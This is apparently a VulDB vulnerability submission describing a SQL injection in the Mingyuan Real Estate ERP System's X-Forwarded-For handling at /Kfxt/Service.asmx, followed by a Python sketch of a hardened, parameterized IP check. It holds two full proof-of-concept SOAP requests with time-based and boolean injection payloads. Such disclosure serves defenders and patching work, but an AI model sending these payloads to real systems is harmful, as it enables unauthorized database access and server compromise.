| Title | Shenzhen Mingyuan Cloud Technology Co., Ltd. Mingyuan Real Estate ERP System v1.0 X-Forwarded-For Injection Vulnerability |
|---|
| Description | When the WebService of the Mingyuan Real Estate ERP system verifies client IP permissions, it does not strictly filter the X-Forwarded-For value it obtains as the real client IP, resulting in a SQL injection vulnerability. Once an authenticated malicious attacker uses the SQL injection vulnerability to obtain information in the database (such as the administrator background password or site users' personal information), the attacker can even read commands to the server with high permissions to further obtain server system permissions.
poc1:
POST /Kfxt/Service.asmx HTTP/1.1
Host:
User-Agent: python-requests/2.32.3
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: keep-alive
Content-Type: text/xml; charset=utf-8
X-Forwarded-For: 127.0.0.1');WAITFOR DELAY '0:0:5'--
SOAPAction: http://www.mysoft.com.cn/queryProjects
Content-Length: 408

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<queryProjects xmlns="http://www.mysoft.com.cn/">
<inpXML><xml><buname>abc</buname></xml></inpXML>
</queryProjects>
</soap:Body>
</soap:Envelope>
poc2:
POST /Kfxt/Service.asmx HTTP/1.1
Host:
User-Agent: python-requests/2.32.3
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: keep-alive
Content-Type: text/xml; charset=utf-8
X-Forwarded-For: 127.0.0.1') AND 6994 IN (SELECT (CHAR(113)+CHAR(122)+CHAR(106)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (6994=6994) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(107)+CHAR(107)+CHAR(113))) AND ('MEuY'='MEuY
SOAPAction: http://www.mysoft.com.cn/queryProjects
Content-Length: 408

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<queryProjects xmlns="http://www.mysoft.com.cn/">
<inpXML><xml><buname>abc</buname></xml></inpXML>
</queryProjects>
</soap:Body>
</soap:Envelope> |
|---|
| Source | ⚠️ https://flowus.cn/share/fa5b99da-2e88-4efd-9266-ae8582782eaa?code=HC3R4E 【FlowUs 息流】Mingyuan Real Estate ERP System V1.0 X-Forwarded-For Injection Vulnerability |
|---|
| User | afish (UID 82290) |
|---|
| Submitted | 2025-03-04 03:46 (1 year ago) |
|---|
| Moderation | 2025-03-15 23:09 (12 days later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 299825 [Shenzhen Mingyuan Cloud Technology Mingyuan Real Estate ERP System 1.0 HTTP Header /Kfxt/Service.asmx X-Forwarded-For SQL injection] |
|---|
| Points | 20 |
|---|
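
The description attributes the flaw to an X-Forwarded-For value that reaches the IP permission query without strict filtering. The sketch below is an added example, not the vendor's code or fix, showing a hardened form of such a check: the header is honoured only when the TCP peer is a known proxy, every hop must parse as a literal IP address, and the lookup uses a bound parameter. The `allowed_ips` table, the proxy address `10.0.0.5`, and the use of `sqlite3` as a stand-in for the product's database are assumptions.

```python
import ipaddress
import sqlite3

# Assumption: the only reverse proxies allowed to set X-Forwarded-For.
TRUSTED_PROXIES = {ipaddress.ip_address("10.0.0.5")}


def client_ip(peer_addr, xff_header):
    """Return the client address as an ip_address object, or None if invalid."""
    peer = ipaddress.ip_address(peer_addr)
    # Ignore the header unless the TCP peer is a proxy we operate.
    if peer not in TRUSTED_PROXIES or not xff_header:
        return peer
    # Walk the chain right to left; the first hop that is not one of our
    # proxies is the address our own infrastructure actually observed.
    for hop in reversed(xff_header.split(",")):
        try:
            addr = ipaddress.ip_address(hop.strip())
        except ValueError:
            return None  # anything that is not a literal IP fails closed
        if addr not in TRUSTED_PROXIES:
            return addr
    return peer


def ip_is_allowed(db, peer_addr, xff_header):
    """Permission check: validated address plus a parameterized lookup."""
    addr = client_ip(peer_addr, xff_header)
    if addr is None:
        return False
    # Bound parameter: the value is never spliced into the SQL text.
    row = db.execute(
        "SELECT 1 FROM allowed_ips WHERE ip = ?", (str(addr),)
    ).fetchone()
    return row is not None


def demo_db():
    """Constructed sample allow-list (hypothetical schema)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE allowed_ips (ip TEXT PRIMARY KEY)")
    db.execute("INSERT INTO allowed_ips VALUES ('127.0.0.1'), ('192.0.2.10')")
    return db
```

With this check, the header value shown in poc1 fails address parsing and is rejected before any query runs, and a spoofed `127.0.0.1` sent directly by an untrusted peer is ignored in favour of the peer address.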